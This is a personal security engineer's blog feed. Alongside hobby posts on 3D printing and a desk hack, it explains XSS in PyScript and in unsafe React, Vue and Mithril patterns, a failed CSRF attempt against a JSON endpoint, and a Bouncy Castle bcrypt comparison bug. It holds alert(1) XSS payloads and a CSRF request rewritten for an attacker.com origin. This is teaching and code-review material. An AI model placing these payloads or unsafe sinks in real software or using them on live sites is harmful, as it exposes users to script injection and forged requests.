Forem: Artur Balsam

Make a thing

Artur Balsam — Tue, 30 Jul 2024 18:25:51 +0000

Before

In my university years, I was somehow involved in 3D printing, mostly through my friends and scientific association. That said, it has never caught on as a hobby; CAD softwares were quirky, printers were expensive, and were 'problematic to live with' types of device.

Now

I've recently purchased a BambuLab p1s - enclosed type of fused deposition modeling printer, capable of printing multiple materials. Why Bambu? Why not Prusa? Being honest, the enclosed construction was deal breaker for me - minimising potentially dangerous fumes from printing was priority; coupled with https://www.printables.com/model/272525-bentobox-v20-carbon-filter-for-bambu-lab-x1c-enclo and frequent room airing, I am less concern about my respiratory health. Also, BambuLabs are known for its low maintenance requirements. And design kind of match my home-office vibe.

Problem

Printing is easy, but creating your own designs? That's totally different story. I've tried several free tiers of CAD software, and fusion360 and Shapr3d are the best so far. Especially the second one, more welcoming learning path, using ipad with pen was much appreciated. But nevertheless, both softwares are expensive, and, for free tiers, have limitations. Shapr3d does not support round objects to be nicely exported to STL format, which is a bummer. And fusion is industry, not a hobbyist level (I admit some features, like generative design are extremely cool). My first creation, the airtag holder fitting under bike bottle cage, took me 10h trans Atlantic flight; from 0 experience to printable object with some design flaws.

Solution. Sort of.

Is it possible to write down physical object idea on your computer and within 1 hour get yourself an exact object on you desk? I am delighted to inform you that: it is fully possible, but it might be frustrating in the process. Especially if you are doing it without checking the design.

As part of the task, I needed code-based CAD and I found one, probably the most popular out there - Openscad https://openscad.org/. It’s well known solution and definitely the learning curve is more gentle, but also not trivial, especially for more complex shapes.

Combining openscad with most popular publicly available LLM, ChatGPT 4o, is quite simple. Without spinning any docker, feeding any data or using any knowledge for both subjects. Just free tier account, verbalised idea and lots of hope.

using openscad create me a airtag holder, that have M5 screws mounting holes with 64mm between, and eliptic shape, with one side blind

After 5 iterations, of me saying 'that's basically a sphere, not an airtag holder' and 'that won't fit an airtag', I got expected shape

After adding some features and more precise descriptions, forming kind of a list of features that needs to be incorporated to the final design, the LLM came up with following solution. Also I've hit pay-wall for free users.

Big remark: the objective of this activity was not to make any manual changes, as soon as shape was already matching my expectations - I've exported STL file.

Printing time

The process of creating artificially made cad project, to create a real object, all within 1 hour, gives me chills and futuristic feel. I played 'Robot rock' by Daft Punk, and hit ‘printing’. Forty minutes later, AirTag holder was done.

Model review

As you can observe, even after few iterations, design is still flawed; namely a thickness of the walls included as part of inside compartment, not as outer body. That resulted in slightly bigger space for AirTag, which did not hold it securely and made a rattling noises. Also, whole design is not what you would call economically optimised (it's big), and not necessarily matching description (it's stadium shape, not elliptical). Despite these minor, easy to fix issues, the design was something that I had on my mind before starting.

Here is a bonus, my design compared to LLM design. I've created lid for maximum weatherproofness, as well as some regions designed as empty space to reduce amount of material required.

Outro

I admit, my own CAD design is nice and functional, but LLM design isn't far off, especially with some minor adjustments. For normal, day-to-day functional prints, that might be pretty useful technique.

OpenAPI/ChatGPT as security tool

Artur Balsam — Wed, 07 Dec 2022 09:05:41 +0000

Intro

Future is bright! Hopefully not from nuclear radiation.

Recently the chatGPT emerged into the spotlight, everyone was trying to somehow use it. But what ChatGPT offers?

We’ve trained a model called ChatGPT which interacts in a conversational way. The dialogue format makes it possible for ChatGPT to answer followup questions, admit its mistakes, challenge incorrect premises, and reject inappropriate requests.

There were some attempts to weaponize openai https://twitter.com/lordx64/status/1598023663328014336
But my question would be - could we use it for product security?

And answer is quick: yes, we can!

Idea

Imagine having a simple problem, like in my previous post, Golang SQL Injection: https://go.dev/doc/database/sql-injection

Let's find out, what the ChatGPT thinks about these, two lines of code:

So we got interesting solution with information about security in your product. Think about it as OWASP Proactive Controls with OWASP Cheat Sheet, with Microsoft Paperclip communication skills.

The only issue is that: proposed solution for vulnerable line of code from first question, would not fix the problem with SQL Injection. Instead of suggested solution, it should provide clear guidance, to construct db query, as in the second example.

Outro

Yes, it's impressive and uncomfortable in the same time, especially in context of Terminator 2, that've recently watched.

But let's make one thing clear, these information was already here. Using simple google search:
. And these OWASP projects are available, for free, all the time.

Links

https://en.wikipedia.org/wiki/Office_Assistant
https://owasp.org/www-project-proactive-controls/
https://cheatsheetseries.owasp.org/
https://chat.openai.com/chat

Disclaimer

Background picture generated by the DALL-E.

SAST Autofix

Artur Balsam — Thu, 24 Nov 2022 22:55:53 +0000

Intro

I believe in automation. That's not very revealing, neither bold, statement, as for 2022.

But most tooling from security world does not include any kind of automation, or, to make it worse, do it unnecessary complicated. Especially fixing findings from static application security testing tools (SAST), shouldn't be much of a hassle. After all, it is operating on finding the patterns, or exact matches in the code.

That got me thinking: is it possible to make simple fixing rules. And I am delighted to say, I've found one! Without further due, the tool in question is: sed

Idea

The high level idea is: in the CI/CD job, when vulnerable part of the code is found, the fix, if available, can be applied, and the vulnerability no longer exist in the code. And all that with simple sed command.

If you do not recall what the sed is

sed is a stream editor. A stream editor is used to perform basic text transformations on an input stream (a file or input from a pipeline).

As it seems to be too good to be true - let's examine the functionality of the sed, and how we could potentially used it against vulnerable code.

Execution

The sed with s command, recognised as substitution, is able to change occurrences of matching regex into something else.

First: `s` into `http`

Starting with simple test.sh file:

curl http://internal.eks-asdf.com/asdf 
curl https://internal.eks-asdf.com/asdf

Let's start with simple scenario: we would love to enforce all scripts to communicate, using https, rather than http to internal EKS address. To achieve that, we could embedded simple job, that changes all occurrences, in all, bash files:

sed 's+http://internal.eks-asdf.com+https://internal.eks-asdf.com/asdf+g' test.sh

The sed command simply states, that http://internal.eks-asdf.com should be replaced with https://internal.eks-asdf.com/asdf, for all occurrences in file.

As we could argue if this example is more associated with migrating from http to https (which is security 'thing'), the fact is, it worked.

Second: SQLi

Going to more security related scenarios: using recommendation from the golang recommendation: https://go.dev/doc/database/sql-injection we can use following rule to remove fmt.Sprintf and change all %s into ? - change assembly of statement as string into actual query.
Having following part of code:

rows, err := db.Query(fmt.Sprintf("SELECT * FROM user WHERE id = %s", id))

And using our 'autofix':

sed 's+(fmt.Sprintf++g;s+%s+?+g;s+.$++g' test.go

Command is combined: removing (fmt.Sprintf, exchanging %s with ? and removing last char .$ (which should be the latest ) character).

We will end with that code, the output will be, valid, and working go sql query:

rows, err := db.Query("SELECT * FROM user WHERE id = ?", id)

It is way more approachable rule than I could imagine: it works for query with multiple parameters, it's self-explanatory, and make everything better.

Usability

Is it possible to implement it user friendly way, into security job? Starting from beginning, sed package can work with configuration file, called Scripts, that stores multiple substitute commands. And it should be possible to write multiple rules for each language, with ease.

Are presented 'rules' optimal? It depends, probably not, but the concept is very appealing to me - the opposite is to change it manually. Or not changing it at all.

It is also very easy, to incorporate it as a job, into pipelines - it should be very appealing concept to everyone.

Outro

I am not saying that you should ditch your sast tooling in the CI/CD pipelines, in favour of ‘sed’. Treat this post as proof of concept of ‘Autofix on cheap’.

Semgrep

It's well thought SAST solution, with great 'user base' and amazing features, and one of them is the automated fixing of the vulnerabilities. It is in the experimental phase, so you can try it yourself.

Links

https://www.nongnu.org/bibledit/sed_rules_reference.html
https://semgrep.dev/docs/

Over Engineered Desk

Artur Balsam — Thu, 15 Sep 2022 18:13:46 +0000

SAFETY DISCLAIMER

As the security engineer I was aware of all potential security issues - and I still am now. But what’s far more concerning me is safety - for now there is no safety system to limit the crashing power of the desk, going down on something, or someone under the desk. And, in case of the Rise of the Machines, I am doomed.

Intro

During the pandemic I've bought myself a gift: Ikea Bekant. Purchase was made to make the 'working from home' experience bearable. Aaaand here we are - 2,5 years working like that. Why Bekant? No idea, probably it was available at that time and my wif... I like white colour.

The problem

The only downside was the control panel: it was required to press one of two buttons, either 'up' or 'down' for the whole time, during changing height. No fixed position for standing or sitting - that's a shame. Or a perfect opportunity for a DIY project.

Solution, hard way

First thought, after a quick look at the desk frame, was to remove the control panel, and instead, put a microcontroller to communicate directly with motors. But as I was lacking an oscilloscope and any tools (my parents basement has it all) I needed a simpler solution.
Some great solutions: https://github.com/trainman419/bekant
https://www.eevblog.com/forum/beginners/ikea-bekant-desk-motorised-hack/

Solution, easy way

Second thought: Emulate the buttons! To imitate the pilot, the GPIO ports should steer the buttons, with 'safety pin' connected directly to GND.

As my Raspberry Pi zero was an overkill, not available and cold dead after another project, I've picked the old (7 years old to be precise) esp32 devkit. I've planned to do my master’s thesis using it, but... The connection is dead simple - three cables from 'pilot', esp32, micro usb cable, no fancy LEDs, no custom nor mechanical switches for operation.

The esp32 was connected, using ingenious technique - male-to-male cables connected to the controllers' tape socket: GPIO22 to 'down', and GPIO23 to 'up' buttons, and safety pin to GND.

At the instigation of my friend Piotr, I've used the Tasmota software, to integrate it with my not-so-smart home setup. Docker based Home Assistant, deployed on Orange Pi Zero 2 (that's some serious dev board!), paired with MQTT Broker Mosquitto as the brain of the system.

Automation - if the 'switch up' is on, set the pin high for N, where N is the empirically measured desk height for your height... in seconds, and then switch off the 'switch up'. Same with the low position. And thanks to Home Automation it was possible to set up the Siri integration.

Outro

With all of that engineering, time, and around 30 USD, I can irritate my wife by saying 'Hey Siri, Office down/up' every time when changing position instead of holding the button for 13 seconds.

PyScript XSS

Artur Balsam — Mon, 16 May 2022 11:37:02 +0000

Run XSS in Your browser

With additional steps

Intro

Last month Anaconda, release the PyScript https://github.com/pyscript/pyscript. Simplifying: The Python in browser, with HTML and JavaScript. Javascript and python, in the browser,. What can possibly can go wrong.

DISCLAIMER: It's fun post, pyscript is great idea, but as everything, security should be some concern.

PyScript XSS

Let's check how it works:
index.html

<!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" href="https://pyscript.net/alpha/pyscript.css" />
        <script defer src="https://pyscript.net/alpha/pyscript.js"></script>
    </head>
    <body>
        <py-script src="/test.py"></py-script>
    </body>
</html>

test.py

print('as<img src=x onerror=alert(1)>df')

and here we are, with XSS:

Outro

Make no mistake, The PyScript, is brilliant product! Just don't forget about security.

Security by incident and surprise

Artur Balsam — Sat, 25 Sep 2021 17:19:29 +0000

Story about weird and totally unplanned countermeasures for CSRF vulnerability that should not work

Intro 1

To properly reheat your pizza: turn on stove on the middle heating option. After putting pizza on a hot skillet, heat it for a few minutes. Then, add some water drops around pizza and put the lid on top and heat for a few more minutes. Done.

Proper intro

Story of how I was stumbled, by a fairly simple non-vulnerable vulnerability.

What CSRF is

Let's begin with CSRF definition from OWASP:

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated.

Successful attacks consist of a user entering a malicious site (phishing), while being authenticated to a vulnerable application, which is without CSRF countermeasures (no token based mitigation: random value sent through hidden fields or headers). Underneath, malicious app calls, through the browser, using browsers’ automatic cookie sending, to the application in question. And this request, changes the state of the application ie. email change, or transfer funds. Or creates new users to internal system. When your GET request changes state (no judgement), CSRF is still possible.

What SOP and CORS is

The Same-Origin Policy, known as SOP, is a browser mechanism that restricts how a document or script loaded by one origin can interact with a resource from another origin. Long story short, how one page can access data from other domains.

CORS - is a mechanism, based on http headers, which allows the server to specify which domains, other than origin, should be allowed to load resources from apps. As the CORS is not simple, and many misunderstandings and misconfigurations were done over the years (even on apps that 'should know better'), it's good to get this knowledge!

From this modest introduction, the question which is probably on your mind: Why SOP and CORS, in CSRF of POST request? Why data protection mechanism in state-changing attack? Let me explain.

Things get serious, exploitation time

Request to, CSRF suspected, endpoint looks like this:

# POST /new-product HTTP/2
# Host: vulnerableapp.com
# Cookie: <removed>
# User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Content-Type: application/json
# Content-Length: 139
# Origin: http://vulnerableapp.com
# Referer: http://vulnerableapp.com/auth
# 
# {
#   "name":"csrf",
#   "size":"c",
#   "active":true
# }

It is potentially perfect request: it has no countermeasures for CSRF and it make some changes by adding new product. And the response, 201 Created as expected.

First attempt

CORS simple request (without preflight request) and POST request is allowed with three values of Content-Type:

application/x-www-form-urlencoded,
multipart/form-data,
text/plain Any other value for this header, made by browser from page A to page B, will be preceded by 'preflight' CORS request - OPTIONS method with Access-Control-Request-Method and Access-Control-Request-Headers headers.

Trying the same request but with SOPs' allowed Content-Type, i.e. we can use text/plain MIME type, in that case, we need to add the = character to trick app to use equals sign as valid json.

# POST /new-product HTTP/2
# Host: vulnerableapp.com
# Cookie: <removed>
# User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
- Content-Type: application/json
+ Content-Type: text/plain
# Content-Length: 139
# Origin: http://attacker.com
# Referer: http://attacker.com/auth
# 
# {
#   "name":"csrf",
#   "size":"c",
#   "active":true,
+   "trick=":"here"
# }

Unfortunately, no success - 500 error. From now on, it was clear that it won't be easy- the application is responding 500 error everytime when, even slight, there is change in request.

Second

Another option is to use XHR and 'go with the flow' of CORS. Set the header Content-Type with xhr.setRequestHeader to application/json and send the payload as it is. The only prerequisites are following response headers:

# Access-Control-Allow-Origin: https://www.attacker.com
# Access-Control-Allow-Credentials: true

And as it turns out CORS are wide open, with Access-Control-Allow-Origin: *, which is worse in many scenarios. However in this case, no Access-Control-Allow-Credentials header, and as result no credentials would be send to vulnerable page by browser. And, as a result, no CSRF.

Third: last but least

If it looks stupid but works, it ain't stupid

However, it won't. But it's worth mentioning that the CORS standard allows browser, send requests with multiple values of the Content-Type header. And it is against the RFC2616 14.17 (HTTP 1.1). Yet, It's perfectly fine for browser to send header like this:

# Content-Type: text/plain; application/json
#

If the server would only check if the value of headers contains application/json as sub-string of the value - that would be a victory.

I LOST. Badly

It should have been a walk in the park, but it wasn't. I was defeated by vulnerable applications, and I cannot even complain, that's impressive. If you have any ideas, how to bypass it (and help with my sleepless nights - it haunts me), please answer here: https://security.stackexchange.com/questions/254895/secure-against-csrf-by-accident

Sources

Authentication bypass in cryptography library

Artur Balsam — Sat, 25 Sep 2021 17:17:42 +0000

Post originally created on github.io on January 2021

Intro

Vulnerability was found by the Synopsys CyRC researchers in the Bouncy Castle java library, in OpenBSDBcrypt class - see following article for more info from their side.

Intro

As it was already written in that post, the issue was with implementation method doCheckPassword- method that checks password against a 60 character Bcrypt string. Let's dive into that and see what was the core issue and how it was fixed.

Analysis

Beginning

In file core/src/main/java/org/bouncycastle/crypto/generators/OpenBSDBCrypt.java we can directly go to method doCheckPassword, where we have couple major checks: whether the Bcrypt string is really Bcrypt string, and if cost factor is from proper range. Nothing special, nothing wrong, just ifs. Relevant to our issue, line 268, states that only string with excatly 60 characters, will be analysed.

if (sLength != 60)

There is nothing wrong with that statment but let's remember the number 60.

Then, in line 307, the Bcrypt hash newBcryptString is generated from password and salt.

String newBcryptString = doGenerate(version, password, salt, cost);

Next, in following lines, created newBcryptString is checked against the provided hash bcryptString. And here we had vulnerability:

        boolean isEqual = sLength == newBcryptString.length();
        for (int i = 0; i != sLength; i++)
        {
            isEqual &= (bcryptString.indexOf(i) == newBcryptString.indexOf(i));
        }
        return isEqual;

In first line of code block there was declaration of a variable with primitive boolean, initialization with the sLength value and comparison between it with an int value from length of newBcryptString. The result should be true, as the freshly created hashed string is 60 char long.
Then there is the for loop, where the first interesting bit is the second statment, where the sLength is used. As you migth remember: 60! So this loop is enumerating from 0 to 59, comparing the outcomes from indexOf method of these two Bcrypt strings.

`indexOf`

Now I would like to focus a little bit on the indexOf. From the documentation: Returns the index within this string of the first occurrence of the specified character.. In the code there is one parameter of the method indexOf, and it is i which basically is an integer in range from 0 to 59. In 34th iteration the following statment is checked:

  isEqual &= (bcryptString.indexOf(33) == newBcryptString.indexOf(33));

And you migth ask, what's the outcome? This operation is checking if index of first occurence of ! in both string is the same. Wait, what? Method overload with one parameter of indexOf method makes i treated as character in Unicode. In other words, this part of code checks if first occurance of unicode characters from 0 to 59 is the same for both strings.

Let's go back - Bcrypt

https://www.usenix.org/legacy/events/usenix99/provos/provos_html/node1.html
The Bcrypt is hash algorythm, based on the Blowfish cipher, intruduced in 1999. After 22 years it should be considered as secure (but is it https://dl.acm.org/doi/10.5555/2671293.2671303) and is very popular when it comes to storing passwords. Not going into crypto details, this is how Bcrypt string looks:

$2a$10$J4oVzGAgiyWfFqYbHINmbOyaq8NUYn60sRUWf1/Dm5GjkJDeVt/VS
|__|__|_____________________|______________________________|
ALG    SALT                  HASH  
   COST

For this issue however, interesting part is what kind of characters are allowed/possible in Bcrypt String. The answer comes from Bcrypt documentation: both strings the salt and hash are base64-encoded: alphanumeric, + and /.

Unicode

So what kind of characters we can get from 0 to 59? The answer is: some, but interesting for us are these:
36 for $,
43 for +,
47 for /,
and range 48-57 for the 0-9 digits.

Combine all of them together

Combining the Bcrypt and Unicode characters could produce "colissions" on /, + and digits range. According to article, around 20% passwords were checked positively in 1000 cases. For example this Bcrypt string $2a$10$J4oVzGAgiyWfFqYbHINmbOyaq8NUYn60sRUWf1/Dm5Gj38DeVt/VS against that one $2a$10$g4YFiQSjPuYvvg4NMwmwROjTB8ODmu6cKYigA1/i15XP38HXHq/ZK would be the same using this code.

Mitigation

The indexOf method was replaced with charAt, which is way more suitable for checking if character in one string is same as in the other.

Secure by default, unsafe by you

Artur Balsam — Sat, 25 Sep 2021 16:32:45 +0000

Post originally created on github.io on October 2020

Disclaimer

This post is the presentation of how to make code UNSAFE. Please, do not use these code snippets in your application, unless you fancy to have a XSS. Read that, for extra protection: https://owasp.org/www-community/xss-filter-evasion-cheatsheet

Intro

In this small repo/blog will show you how to make modern, secure JS Frameworks, unsafe in nice way. Using purely these frameworks, we are going to end up with XSS. Following examples might be useful during code review or making a new version of DVWA, it’s up to you. Yes, you can find all these informations in the docs, but let's be honest - RTFM is not for everyone.

The Overview: Brave New World of JavaScript

Using this marvellous blog post Top JS Frameworks 2019 and followed by this awesome research State of JS 2019 it’s naturally that that I’ve did research on following ones:

The most popular, the king: The ReactJS;
The third, mr. lightweight Vue.js;
I’ve also added Mithril, because why not.

I am planning do something similar to others also. Stay tunned

ReactJS

Along with other possiblities of 'standard' XSS, this one using React DOM. Attribute called dangerouslySetInnerHTML can be used to set HTMLdirectly form REACT. dangerously part should suggest the user, that she/he doing something risky. In princple the DOM node will be updated with the object with key _html, the HTML. And yes, I've seen this in the wild, with data suppiled by user.

<div dangerouslySetInnerHTML={{__html: 'Not safe at all <img src=x onerror=alert(1)>'}} />

Documentation

VueJS

Remember, the Client side template injection with AngularJS? If not, I encourage you to do it right here, right now. In Angular 1.6.x, they removed whole sandbox thigh altogether, but last payload, from Sir Mario Heiderich

{{constructor.constructor('alert(1)')()}}

should bring our attention. Elegant, isn't it? And right now, it works on VueJS because of template possibility and mixing clientside and serverside rendering Great post with PoC on that

<a>Not great, not terrible{{constructor.constructor('alert(1)')()}}<a>

Documentation

Mithril

Starting from the middle the m.trust should be avoidable, but if not, it can be dangerous, especially with user supplied data. Especially unsanitized data.

m("div", [
    m.trust("<h1>Here's some <img src=x onerror=alert(1)></h1>")
])

Documentation

Corona Virus Threat Modelling

Artur Balsam — Sat, 25 Sep 2021 16:19:50 +0000

Post originally created on github.io on March 2020

Intro

Well, we are doomed. And to add that, we are having the CORONA-19 virus around. Some of you might be familiar with the Threat Modelling in IT security but today I would like to make a Threat Modelling for your daily activity but with corona virus as main threat.

DISCLIMER
This post should NOT be treated as real measurement for preventing virus, neither it's a good representation of threat modelling of IT systems. This post reflects NONE medical value beside link to WHO. Treat it as mind puzzle.

Technical intro

For those, not familiar with Threat Modelling: it is the structured and continuous process of identifying security threats in the software. The definition is not really precise about, what kind of processes and techniques we should use, so let's free solo it!

Story

As you are in self-quarantine mode, but eating is quite essential, you need to get out and go out to nearest shop. Not favourite, nearest. To achieve goal of buying some pasta and tomatoes, you need to get from you flat, go thru corridor, ride elevator, walk 600m to nearest shop, buy stuff and survive on same way back.

Actors

You,
Unintentional attacker (person who is a carrier or sick, unintentional attacker in our puzzle),
Intentional attacker (person who is not sick, but tries to, based on panic, gain something),
Other people,
Dogs.

'Technology' stack

Human body - with a limited immune system (dependent on Multiple factors),
CORONA-19 - easy spreading virus with the middle level of deadlines,
Hand sanitizers, soap, water etc.,
Door knobs, handles, baskets etc.

Environment

Corridor,
The elevator,
1,2 km way,
Shop.

Threat Modelling

As I am alone, I will guide you thru the story with marks, where the threats are.

On the beginning, let's take a look on STRIDE, Microsoft methodology:

Spoofing - an attacker pretending to be someone else (unintentional attacker tries to look like healthy person)
Tampering - attacker force user to perform action (make handshake, hug you)
Repudiation - attacker performing attack without being noticed/ proved (yup, it won't be easy to prove that, some sneaky sneeze etc.)
Information disclosure (privacy breach or data leak) - everyone, especially in Poland, wants to know your PESEL number, also intentional attackers
Denial of a service - attack that will limit or disable your usability
Elevation of the privilege - intentional attacker pretending to have access to data/ privilege to some action (all kind of phishing attacks for your data or virus trying to take over your immune system).

Clearly, we should divide these problems for two groups: the main about threats connected with the virus itself and the second, phishing or other activities.

Getting out from flat to corridor should be safe, especially with face mask, only one handle form apartment door. And we have a first threat on our list, that might be pretty popular - door knob/ handle with virus on it. Then we need to pass one door from our neighbour (potential unintentional attacker), but we have a luck, no one is there - however we can think that meeting our beloved neighbourhood/friend/family member might give us threat number two - the physical contact with unintentional attacker. Next is the elevator, small area, without sufficient ventilation with little separation between people - obvious threat and increasing factor for unintentional attacker. On the way back we will use the stairs. Walk to the shop might not be as extreme as it seems, but we need to be careful on the cross walk, potential car hit might result in hospital care, which sure it's another threat for us - being in hospital during pandemic! In the shop we are putting pasta and tomatoes to small hand handled basket. Aaaand we have a next threat - similar to that one with door handle, make it as one: touching things. Also, in the shop there is more people than anywhere else in our scenario, the risk for getting sneezed by unintentional attacker increasing - so threat number two, meeting with unintentional attacker is having prime role here. You are paying - getting change in coins or bills triggers threat number one, paying with card or phone touch-less will minimalize it. If you have clean phone :). As you are environmentalist you have your own bag (from IT conference) and probably not taking the bill. On the way home you meet friendly dog, and thanks to WHO, we know, that consent belly rub for good boy is 100% safe for you and for him (in terms of COVID-19, make sure, that good boy is good boy). Next, getting your pin on pin pad (classified as door handle) and we are in staircase. A little bit of training and we are at our door. We have made it! But the phone is ringing and we are answering (with our dirty hands) - someone, that present herself as Sanitary - Epidemiological worker and tries to confirm our identity (threat number n). Now wash your hands, products that you bought and your phone!

Identified threats

Getting contact with, potentially, virus contaminated surfaces,
Physical contact with unintentional attacker,
Sharing small closed area with others,
Communication accident with high risk of hospitalisation,
Staying unnecessary in crowded places,
Phishing attempt.

Short walk for tomato gives you 6, quite obvious and general threats, but quite dangerous. Make something similar by yourself with your daily activities and see.

Recommendations

But let's see how we can limit the risk: https://www.who.int/health-topics/coronavirus#tab=tab_2
And about phishing: do not give any confidential information to person, whose identity cannot be proved.

Outro

Read about Corona Virus from WHO pages. Stay strong and stay home!

Forem: Artur Balsam

Make a thing

Before

Now

Problem

Solution. Sort of.

Printing time

Model review

Outro

OpenAPI/ChatGPT as security tool

Intro

Idea

Outro

Links

Disclaimer

SAST Autofix

Intro

Idea

Execution

First: s into http

Second: SQLi

Usability

Outro

Semgrep

Links

Over Engineered Desk

SAFETY DISCLAIMER

Intro

The problem

Solution, hard way

Solution, easy way

Outro

PyScript XSS

Run XSS in Your browser

With additional steps

Intro

PyScript XSS

Outro

Security by incident and surprise

Story about weird and totally unplanned countermeasures for CSRF vulnerability that should not work

Intro 1

Proper intro

What CSRF is

What SOP and CORS is

Things get serious, exploitation time

First attempt

Second

Third: last but least

I LOST. Badly

Sources

Authentication bypass in cryptography library

Intro

Intro

Analysis

Beginning

indexOf

Let's go back - Bcrypt

Unicode

Combine all of them together

Mitigation

Secure by default, unsafe by you

Disclaimer

Intro

The Overview: Brave New World of JavaScript

ReactJS

VueJS

Mithril

Corona Virus Threat Modelling

Intro

Technical intro

Story

Actors

'Technology' stack

Environment

Threat Modelling

Identified threats

Recommendations

Outro

First: `s` into `http`

`indexOf`